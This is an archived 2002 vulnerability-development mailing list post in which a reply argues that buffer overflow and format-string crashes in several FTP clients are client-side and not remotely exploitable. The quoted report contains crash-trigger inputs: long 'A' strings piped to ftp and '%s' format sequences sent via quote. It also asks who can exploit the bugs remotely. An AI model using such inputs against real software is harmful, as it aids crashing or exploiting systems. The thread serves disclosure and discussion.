Vulnerability Development mailing list archives
Re: Multiple Local Vulnerabilities in some FTP Client.Who can exploit it by remote?
From: Stan Bubrouski <stan () ccs neu edu>
Date: Sun, 05 May 2002 16:02:08 -0400
lion wrote:
Multiple vuln-devLocal Vulnerabilities in some FTP Client. 1. Windows 2000 and other Version FTP Client Overflows and Format String Vulnerability. a. d:\>perl -e "printf 'A'x3000"|ftp Invalid command. ftp> will see the 0x4141414d memory addr not be read erroor. d:\>perl -e "printf 'open '. 'A'x3000"|ftp Already connected to (null), use disconnect first.
This is a client-side bug the client themselves would have to exploit, making it irrelevent.
will see the 0x4141414d memory addr not be read erroor. b. d:\>ftp localhost Connected to lion. 220 lion Microsoft FTP Service (Version 5.0). User (lion:(none)): ftp 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 Anonymous user logged in. ftp> debug Debugging On . ftp> cd AAAAAAAAAA…… ('A' x 500) 500 Command was too long 421 Terminating connection. Connection closed by remote host. ftp> debug Debugging On . ftp> open localhost Connected to lion. 220 lion Microsoft FTP Service (Version 5.0). User (lion:(none)): ftp ---> USER ftp 331 Anonymous access allowed, send identity (e-mail name) as password. Password: ---> PASS f 230 Anonymous user logged in. ftp> cd AAAAAAAAAAAAAAAA……('A'x 2000) will see the 0x41414141 memory addr not be read erroor.
Client-side, again no remote threat.
ftp> ls AAAAAAAAAAAAAAAA……('A'x 2000) ---> PORT 127,0,0,1,4,114 200 PORT command successful. ---> NLST AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA…….. will see the 0x41414141 memory addr not be read erroor.
Client-side, again no remote threat.
c. d:\>ftp localhost Connected to lion. 220 lion Microsoft FTP Service (Version 5.0). User (lion:(none)): ftp 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 Anonymous user logged in. ftp> debug Debugging On . ftp> quote %s ---> quote %s 500 'QUOTE %s': command not understood ftp> quote %s%s%s ---> quote %s%s%s?(null) 500 'QUOTE %s%s%s (null)': command not understood ftp> quote %s%s%s%s%s%s%s%s ---> will see the 0x73257325 memory addr not be read erroor. Use W32Dasm isamssemble the ftp.exe, we can find the 780127A8 mov dword ptr [eax],ecx This is a character with win2000 Format Strings Vulnerability.
Client-side, again no remote threat.
2. Cygwin version 2.194.2.21 and Redhat 6.2 FTP Client Format String Vulnerability. lion@LION ~ $ ftp localhost Connected to lion. 220 lion Microsoft FTP Service (Version 5.0). Name (localhost:lion): ftp 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 Anonymous user logged in. Remote system type is Windows_NT. ftp> debug Debugging on (debug=1). ftp> quote %s ---> %s 500 '%S': command not understood ftp> quote %s%s%s%s%s%s%s Segmentation fault (core dumped) Who can exploit it by remote? Sorry for my poor English.:) Lion lion () cnhonker net HUC
None of these bugs are remotely exploitable, and the Red Hat 6.2 FTP client was patched over a year ago and it was irrelent because it was client-side. Never-the-less these bugs should be fixed at some point for stability of the FTP clients if nothing else. Best Regards, Stan Bubrouski
Current thread:
- Multiple Local Vulnerabilities in some FTP Client.Who can exploit it by remote? lion (May 05)
- Re: Multiple Local Vulnerabilities in some FTP Client.Who can exploit it by remote? Stan Bubrouski (May 05)
- RE: Multiple Local Vulnerabilities in some FTP Client.Who can exploitit by remote? Brett Moore (May 06)
- Re: Multiple Local Vulnerabilities in some FTP Client.Who can exploitit by remote? SpaceWalker (May 06)
- RE: Multiple Local Vulnerabilities in some FTP Client.Who can exploitit by remote? Brett Moore (May 06)
- Re: Multiple Local Vulnerabilities in some FTP Client.Who can exploit it by remote? SpaceWalker (May 05)
- Re: Multiple Local Vulnerabilities in some FTP Client.Who can exploit it by remote? Frank Knobbe (May 08)
- Re: Multiple Local Vulnerabilities in some FTP Client.Who can exploit it by remote? Stan Bubrouski (May 05)